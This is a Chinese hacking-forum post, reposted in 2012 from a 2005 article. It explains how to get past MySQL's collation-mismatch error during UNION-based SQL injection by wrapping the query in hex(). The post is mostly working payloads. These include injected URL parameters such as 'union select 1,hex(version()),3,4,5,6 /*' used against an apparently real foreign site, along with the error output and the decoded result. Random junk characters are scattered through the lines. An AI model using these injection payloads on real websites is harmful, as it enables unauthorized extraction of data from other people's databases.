找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2060|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei3 P  C0 C4 O$ O' A4 q5 g; {
文章性质:原创) u+ O. D7 v2 r0 w3 H/ ^+ D0 Y( H" X
发布日期:2005-10-18; u0 L% w# f- Y) l" G
测试个国外的站时:/ ?8 d# j, z( e+ i
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
# T& ^  ^9 w1 u, o返回错误:5 ?2 `7 |/ p$ i' K9 [6 L! Z# ^( p
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'! w* b( \; [& V' [, V( J- Z
MySQL Error No. 1269 O; _# \$ M, U; Y
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。9 a: _2 t2 |/ M' v8 [
解决办法:转为其他编码如hex。; O0 z& z$ \) i" A, b. z5 W
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
1 s9 L' o6 O# a* B成功得到hex(version())的值为:6 t9 R, V7 c5 r& K
342E312E332D62657461
/ o% K: ^1 N/ s% o) c. s' j- g8 }( P回Mysql查询下得到:9 J- t9 X3 [9 g! k& H9 \
mysql> select 0x342E312E332D62657461;
6 t8 G4 a- _& u9 u; ?+------------------------+
/ ]0 J) E( E& b, B$ l" h# o3 O| 0x342E312E332D62657461 |2 j# s/ k0 T3 i: Q  X  f* B& T8 ^! s6 V
+------------------------+
4 O3 H: k3 H4 u+ q( a| 4.1.3-beta |
% Y, e  |2 t0 g+------------------------+  W, u% }/ H4 U; z9 W/ ^4 o% C
1 row in set (0.00 sec)
8 [3 c" p9 U2 m+ a
8 M) u+ B4 i' W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表